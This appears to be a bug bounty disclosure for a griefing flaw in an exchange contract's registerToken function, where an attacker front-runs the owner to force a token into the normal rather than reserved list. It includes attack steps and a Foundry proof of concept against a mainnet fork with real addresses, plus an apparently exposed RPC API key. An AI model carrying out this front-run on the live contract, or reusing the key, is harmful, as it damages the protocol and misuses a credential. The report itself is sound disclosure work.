Griefing (e.g. no profit motive for an attacker, but damage to the users or the protocol)
Description
functionregisterToken(ExchangeData.StatestorageS,address tokenAddress,bool isOwnerRegister )publicreturns (uint32 tokenID) {require(!S.isInWithdrawalMode(),"INVALID_MODE");require(S.tokenToTokenId[tokenAddress] ==0,"TOKEN_ALREADY_EXIST");if (isOwnerRegister) {require(S.reservedTokens.length < ExchangeData.MAX_NUM_RESERVED_TOKENS,"TOKEN_REGISTRY_FULL"); } else {require(S.normalTokens.length < ExchangeData.MAX_NUM_NORMAL_TOKENS,"TOKEN_REGISTRY_FULL"); }// Check if the deposit contract supports the new tokenif (S.depositContract !=IDepositContract(0)) {require(S.depositContract.isTokenSupported(tokenAddress),"UNSUPPORTED_TOKEN"); }// Assign a tokenID and store the token ExchangeData.Token memory token = ExchangeData.Token(tokenAddress);if (isOwnerRegister) { tokenID =uint32(S.reservedTokens.length); S.reservedTokens.push(token); } else { tokenID =uint32(S.normalTokens.length.add(ExchangeData.MAX_NUM_RESERVED_TOKENS)); S.normalTokens.push(token); } S.tokenToTokenId[tokenAddress] = tokenID +1; S.tokenIdToToken[tokenID] = tokenAddress; S.tokenIdToDepositBalance[tokenID] =0;emitTokenRegistered(tokenAddress, tokenID); }
Everyone can call registerToken to register a token. If it is called by the owner, the token is added to reservedTokens, otherwise it is added to normalTokens. Once a token is added to reservedTokens or normalTokens, it cannot be added again.
Therefore, the attacker can add the token that the Owner expects to be added to reservedTokens to normalTokens first.
The attack process is as follows:
Owner call registerToken to register TokenA
The attacker observes that mempool recognizes the Owner's transaction, initiates a transaction with a higher gas price, and front-run executes registerToken to register TokenA.
Please refer to the above document for the difference between reservedTokens and normalTokens. The owner's inability to add tokens to reservedTokens may damage the stable run of the protocol.
Risk Breakdown
Difficulty to Exploit: Easy
Recommendation
Owner can convert normalTokens into reservedTokens, which can prevent this BUG. And it allows the Owner to have the ability to add reservedTokens in the future. (For example, if a Token becomes popular, consider upgrading it from normalTokens to reservedTokens).
References
Proof of concept
// SPDX-License-Identifier: UNLICENSEDpragmasolidity ^0.8.13;import"forge-std/Test.sol";// main fork urlstringconstant MAINNET_RPC_URL ="https://eth-mainnet.g.alchemy.com/v2/TrnSBL14bW3BaXavojgbw69L0ZK2lbZ_";uint256constant MAINNET_BLOCK_NUMBER =18614000;// contract addressaddressconstant ADDRESS_CONTRACT_ExchangeV3 =address(0x9C07A72177c5A05410cA338823e790876E79D73B);addressconstant ADDRESS_CONTRACT_WETH =address(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);// user addressaddressconstant ADDRESS_USER_ExchangeV3Owner =address(0x9b93e47b7F61ad1358Bd47Cd01206708E85AE5eD);addressconstant ADDRESS_USER_Attacker =address(0xAACE);interface IExchangeV3 {functionregisterToken(address tokenAddress) externalreturns (uint32);}contractYttriumzzDemoisTest { IExchangeV3 exchangeV3;functionsetUp() public { vm.selectFork(vm.createFork(MAINNET_RPC_URL, MAINNET_BLOCK_NUMBER)); exchangeV3 =IExchangeV3(ADDRESS_CONTRACT_ExchangeV3); }functiontestYttriumzzDemo() public {// This POC assumes this scenario:// The Owner wants to add WETH to the `reservedTokens` list and call the `registerToken` function.// The Attacker checked that the mempool contained this transaction and frount-run call the `registerToken` function,// causing WETH to be added to the `normalTokens` list.// // In order to simplify the POC:// The Attacker is executed first, instead of providing a high gas price to let the node execute in advance.//// Results:// WETH is added to the `normalTokens` list, and the Owner's transaction execution fails. vm.startPrank(ADDRESS_USER_Attacker);uint32 tokenID = exchangeV3.registerToken(ADDRESS_CONTRACT_WETH); vm.stopPrank(); vm.startPrank(ADDRESS_USER_ExchangeV3Owner); vm.expectRevert("TOKEN_ALREADY_EXIST"); exchangeV3.registerToken(ADDRESS_CONTRACT_WETH); vm.stopPrank();assertTrue(tokenID >32); console.log("tokenID: %s", tokenID); }}